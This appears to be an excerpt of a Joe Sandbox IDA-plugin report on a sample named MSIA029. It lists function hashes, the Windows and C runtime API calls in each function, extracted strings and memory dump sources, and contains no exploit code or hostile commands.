                                                                                                                                                                                                                                                  • Opcode ID: b5fe0ed3c1611289dc3c9293e1fe279f5ffc608c62d22a98929317ef92888825
                                                                                                                                                                                                                                                  • Instruction ID: 77112ad6296edc56383222f9934aaea0c32d155d789dfab2376c0d5d6a3eab32
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b5fe0ed3c1611289dc3c9293e1fe279f5ffc608c62d22a98929317ef92888825
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1651E471D00209DFDB11CF58C8917AEBBB4FF10324F24819DE915AB392D7B59A04EB81
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F3B731
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F3B74F
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F3B777
                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000008,00000000,80A20388,?,00000000,00000000), ref: 00F3B7CF
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F3B863
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F3B88D
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_LocalRegister
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3931714976-0
                                                                                                                                                                                                                                                  • Opcode ID: bad4c0e36179b790948b34e9408b8c2b0b0fca9d2f57277b73db527f489ebb89
                                                                                                                                                                                                                                                  • Instruction ID: 91a179bfc241765a0b0ee217260ffcf3198f4a89abcfdc766b3475b8e980bc91
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bad4c0e36179b790948b34e9408b8c2b0b0fca9d2f57277b73db527f489ebb89
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B51AC71D04218DFCB11CF58C8A4BAEBBB4EF54720F24855DE905AB381D7B4AE01EB81
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
• Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
Similarity
• API ID: __freea$__alloca_probe_16
• String ID: a/p$am/pm
• API String ID: 3509577899-3206640213
APIs
• GetLastError.KERNEL32(?,?,00F5596F,00F54900,00F5358F), ref: 00F55986
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F55994
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F559AD
• SetLastError.KERNEL32(00000000,00F5596F,00F54900,00F5358F), ref: 00F559FF
Memory Dump Source
• Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
• Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
APIs
• GetTempFileNameW.KERNEL32(?,URL,00000000,?,80A20388,?,00000004), ref: 00F33294
• MoveFileW.KERNEL32(?,00000000), ref: 00F3354A
• DeleteFileW.KERNEL32(?), ref: 00F33592
  • Part of subcall function 00F31A70: LocalAlloc.KERNEL32(00000040,80000022), ref: 00F31AF7
  • Part of subcall function 00F31A70: LocalFree.KERNEL32(7FFFFFFE), ref: 00F31B7D
  • Part of subcall function 00F32E60: LocalFree.KERNEL32(?,80A20388,?,?,00F73C40,000000FF,?,00F31242,80A20388,?,?,00F73C75,000000FF), ref: 00F32EB1
Strings
Memory Dump Source
• Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
• Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
Similarity
• API ID: FileLocal$Free$AllocDeleteMoveNameTemp
• String ID: URL$url
• API String ID: 853893950-346267919
APIs
• GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00F33735
• GetLastError.KERNEL32(?,?,?,00F74215,000000FF), ref: 00F3381A
  • Part of subcall function 00F32310: GetProcessHeap.KERNEL32 ref: 00F32365
  • Part of subcall function 00F346F0: FindResourceExW.KERNEL32(00000000,00000006,?,00000000,00000000,?,?,?,?,00F33778,-00000010,?,?,?,00F74215,000000FF), ref: 00F34736
• _wcschr.LIBVCRUNTIME ref: 00F337C6
• LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,00F74215,000000FF), ref: 00F337DB
Strings
Memory Dump Source
• Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
• Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
Similarity
• API ID: DirectoryErrorFindHeapLastLibraryLoadProcessResourceSystem_wcschr
• String ID: ntdll.dll
• API String ID: 3941625479-2227199552
APIs
  • Part of subcall function 00F31A20: LocalFree.KERNEL32(?), ref: 00F31A42
  • Part of subcall function 00F53E5A: RaiseException.KERNEL32(E06D7363,00000001,00000003,00F31434,?,?,00F3D341,00F31434,00F88B5C,?,00F31434,?,00000000), ref: 00F53EBA
• GetCurrentProcess.KERNEL32(80A20388,80A20388,?,?,00000000,00F74981,000000FF), ref: 00F362EB
  • Part of subcall function 00F52C98: EnterCriticalSection.KERNEL32(00F8DD3C,?,?,?,00F323B6,00F8E638,80A20388,?,?,00F73D6D,000000FF), ref: 00F52CA3
  • Part of subcall function 00F52C98: LeaveCriticalSection.KERNEL32(00F8DD3C,?,?,?,00F323B6,00F8E638,80A20388,?,?,00F73D6D,000000FF), ref: 00F52CE0
• GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 00F362B0
• GetProcAddress.KERNEL32(00000000), ref: 00F362B7
  • Part of subcall function 00F52C4E: EnterCriticalSection.KERNEL32(00F8DD3C,?,?,00F32427,00F8E638,00F76B40), ref: 00F52C58
  • Part of subcall function 00F52C4E: LeaveCriticalSection.KERNEL32(00F8DD3C,?,?,00F32427,00F8E638,00F76B40), ref: 00F52C8B
  • Part of subcall function 00F52C4E: RtlWakeAllConditionVariable.NTDLL ref: 00F52D02
Strings
Memory Dump Source
• Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
• Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
Similarity
• API ID: CriticalSection$EnterLeave$AddressConditionCurrentExceptionFreeHandleLocalModuleProcProcessRaiseVariableWake
• String ID: IsWow64Process$kernel32
• API String ID: 1333104975-3789238822
                                                                                                                                                                                                                                                  • Opcode ID: b656b04648db29ae68777f4302e8c8fd212d75d3ce72deccc5004f9584f028a1
                                                                                                                                                                                                                                                  • Instruction ID: d17b84973946d42c8aa8e19ca6e4c7d6551bf30292427b58d522f10a169670e5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b656b04648db29ae68777f4302e8c8fd212d75d3ce72deccc5004f9584f028a1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 65219371D54709EFCB10EFA4DD06BADB7A8FB15B21F100225E915932D0E778A504AB62
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Mpunct$GetvalsH_prolog3
                                                                                                                                                                                                                                                  • String ID: $+xv
                                                                                                                                                                                                                                                  • API String ID: 2204710431-1686923651
                                                                                                                                                                                                                                                  • Opcode ID: 1b3bd739266ef2adc04035d6528d1004d090bf7c8700521c65ffe8229c1515ae
                                                                                                                                                                                                                                                  • Instruction ID: 3290cb98755b43613af414f042c2e8a98c18bd00a98f134edb16e268f3ff8b28
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1b3bd739266ef2adc04035d6528d1004d090bf7c8700521c65ffe8229c1515ae
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7421C4B1904B926ED725DF74C89073FBEF8AB08351F04455AE859C7A42D778E602DBA0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(80A20388,80A20388,?,?,00000000,00F74981,000000FF), ref: 00F362EB
                                                                                                                                                                                                                                                    • Part of subcall function 00F52C98: EnterCriticalSection.KERNEL32(00F8DD3C,?,?,?,00F323B6,00F8E638,80A20388,?,?,00F73D6D,000000FF), ref: 00F52CA3
                                                                                                                                                                                                                                                    • Part of subcall function 00F52C98: LeaveCriticalSection.KERNEL32(00F8DD3C,?,?,?,00F323B6,00F8E638,80A20388,?,?,00F73D6D,000000FF), ref: 00F52CE0
                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 00F362B0
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00F362B7
                                                                                                                                                                                                                                                    • Part of subcall function 00F52C4E: EnterCriticalSection.KERNEL32(00F8DD3C,?,?,00F32427,00F8E638,00F76B40), ref: 00F52C58
                                                                                                                                                                                                                                                    • Part of subcall function 00F52C4E: LeaveCriticalSection.KERNEL32(00F8DD3C,?,?,00F32427,00F8E638,00F76B40), ref: 00F52C8B
                                                                                                                                                                                                                                                    • Part of subcall function 00F52C4E: RtlWakeAllConditionVariable.NTDLL ref: 00F52D02
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave$AddressConditionCurrentHandleModuleProcProcessVariableWake
                                                                                                                                                                                                                                                  • String ID: IsWow64Process$kernel32
                                                                                                                                                                                                                                                  • API String ID: 2056477612-3789238822
                                                                                                                                                                                                                                                  • Opcode ID: d59fecf39f74d43deeaeecab41b0ece38b3472c74efd63538da57bd9ad9de472
                                                                                                                                                                                                                                                  • Instruction ID: 1b1787aaf452b2307a2f57c571d2b20cc170d354b3dd6df6c2a75698ff063cbd
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d59fecf39f74d43deeaeecab41b0ece38b3472c74efd63538da57bd9ad9de472
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C911A272D14718EFCB10DF54DD05BA9B7A8FB15B20F00426AE815D37D0E775A904EB52
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,00F56AA3,?,?,00F8DDCC,00000000,?,00F56BCE,00000004,InitializeCriticalSectionEx,00F797E8,InitializeCriticalSectionEx,00000000), ref: 00F56A72
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                                                                                                                  • String ID: api-ms-
                                                                                                                                                                                                                                                  • API String ID: 3664257935-2084034818
                                                                                                                                                                                                                                                  • Opcode ID: d0d6caeff6e16acc5ab1a15b50a192966e303bc7e787732771cd34b0e973e288
                                                                                                                                                                                                                                                  • Instruction ID: 38a17c46b580d8ca98af7bb1a17fa9adba1b8bfb4b68b557d4800c6f458bf433
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d0d6caeff6e16acc5ab1a15b50a192966e303bc7e787732771cd34b0e973e288
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4111CA32E04325ABCF229B689C41B5937949F12772F544260FF25FB280D774ED04A7D5
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,80A20388,?,?,00000000,00F76A6C,000000FF,?,00F62DC1,?,?,00F62D95,?), ref: 00F62E23
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00F62E35
                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,00F76A6C,000000FF,?,00F62DC1,?,?,00F62D95,?), ref: 00F62E57
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                  • Opcode ID: 454b832fc01998dbc6951577892e906b7c72299461d1aee50b50c0c9dd7f27d2
                                                                                                                                                                                                                                                  • Instruction ID: edac9e5e328ca27129b5fdbc1a8a50206f4b39610ee3beb33e1abb3ddee3e10d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 454b832fc01998dbc6951577892e906b7c72299461d1aee50b50c0c9dd7f27d2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1E01A731918B1DABDB129F40CC05FAFBBB9FB44B10F004525F815E22A0DB759900DB92
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00F66E40
                                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00F66F01
                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 00F66F68
                                                                                                                                                                                                                                                    • Part of subcall function 00F65BDC: HeapAlloc.KERNEL32(00000000,00000000,00F63841,?,00F6543A,?,00000000,?,00F56CE7,00000000,00F63841,00000000,?,?,?,00F6363B), ref: 00F65C0E
                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 00F66F7D
                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 00F66F8D
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1096550386-0
                                                                                                                                                                                                                                                  • Opcode ID: 93de434a40671367c6f55b63474d5d31fd7b4c53008ab27f29ae3e84b2ce87b3
                                                                                                                                                                                                                                                  • Instruction ID: 6ed37c7ced05e5905b8249c41975afb8382cabbd23c370953588933b52e2bc37
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 93de434a40671367c6f55b63474d5d31fd7b4c53008ab27f29ae3e84b2ce87b3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 09519072A00206AFEB219FA5DC81EBF7AA9EF54764B150229FD04D7151F735DC10B760
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F3B8DD
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F3B900
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F3B928
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F3B98D
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F3B9B7
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 459529453-0
                                                                                                                                                                                                                                                  • Opcode ID: 6cd991276e04835ba34c916d6f36d0fed1b91c6402fc7b35d6d68beaa2aa5c0d
                                                                                                                                                                                                                                                  • Instruction ID: 5bad69d9f45332281d22f02824acfe03005411300adbb709c65469567f28a10e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6cd991276e04835ba34c916d6f36d0fed1b91c6402fc7b35d6d68beaa2aa5c0d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9A310631D01218DFCB11CF54D990BAEBBB4EF24334F144159EA046B3A1DB35AE01EB91
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,?,?,76B14450,00F35646,?,?,?,?,?), ref: 00F35898
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                                                                                  • String ID: Call to ShellExecuteEx() returned:$Last error=$false$true
                                                                                                                                                                                                                                                  • API String ID: 1452528299-1782174991
                                                                                                                                                                                                                                                  • Opcode ID: a7ad338a37c776e7e59367e4a35f215c0bdd3bb9c1ccb662b5f0057e1da73ca4
                                                                                                                                                                                                                                                  • Instruction ID: ea442c78fff1aa600f8cc873ffe924270823cd926eea2f8a56c2540954e95bde
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a7ad338a37c776e7e59367e4a35f215c0bdd3bb9c1ccb662b5f0057e1da73ca4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3C118E56E1162587CB302F6CD8003A6B2E4DF90B74F65047FE889D7392EAB98C81A394
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Maklocstr$Maklocchr
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2020259771-0
                                                                                                                                                                                                                                                  • Opcode ID: e822b428384f5cf927c2b830cf53579db6d2aa42234418f3855afb998f49694f
                                                                                                                                                                                                                                                  • Instruction ID: a3645a512ece124c0e37acec273f08a27b5aa4fab1b05b4d7716dbab55ea7889
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e822b428384f5cf927c2b830cf53579db6d2aa42234418f3855afb998f49694f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 951191B1940784BFE720DBA4CC81F52BBECBF04750F040519FA55CBA41D268FC9497A9
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F3D883
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F3D88D
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • numpunct.LIBCPMT ref: 00F3D8C7
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F3D8DE
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F3D8FE
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 743221004-0
                                                                                                                                                                                                                                                  • Opcode ID: dccd47c2c63d05e4372774c8000d2e186f6a27ec63241096fc0d7e9754282f9b
                                                                                                                                                                                                                                                  • Instruction ID: 9ffb3cb021d0df5b9ccf580af35667caed58ab6dcf9af08df59a121a9dea94c7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dccd47c2c63d05e4372774c8000d2e186f6a27ec63241096fc0d7e9754282f9b
